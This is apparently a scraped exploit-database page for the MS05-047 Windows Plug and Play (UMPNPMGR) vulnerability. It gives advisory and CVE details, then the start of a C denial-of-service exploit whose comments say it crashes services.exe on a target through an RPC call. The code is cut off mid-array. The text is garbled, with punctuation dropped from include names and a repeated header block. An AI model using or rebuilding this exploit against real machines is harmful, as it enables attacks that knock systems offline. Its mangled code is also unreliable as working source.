Microsoft Windows Plug and Play "Umpnpmgrdll" Remote Exploit (MS05-047) Date : 21/10/2005Advisory : [25]FrSIRT/ADV-2005-2044CVE ID : [26]CVE-2005-2120Rated as : [27]High Risk [3gif] #include <stdioh>#include <windowsh>#pragma comment(lib, "mpr")#pragma comment(lib, "Rpcrt4")unsigned char szBindString[] ={0x05,0x00,0x0b,0x03,0x1 ...
// tested and approved /str0ke
/* Program: Denial of Service attack for MS UMPNPMGR PNP_GetDeviceList
* Author: Winny Thomas
* Vulnerability: no length checking on passed parameter to PNP_GetDeviceList in UMPNPMGRdll
* Note: The code crashes servicesexe on the target, effectively bringing down the target against which its run
* This code is ...
#include <stdioh>
#include <windowsh>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
unsigned char szBindString[] =
{
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x40,0x4e,0x9f,0x8d, ...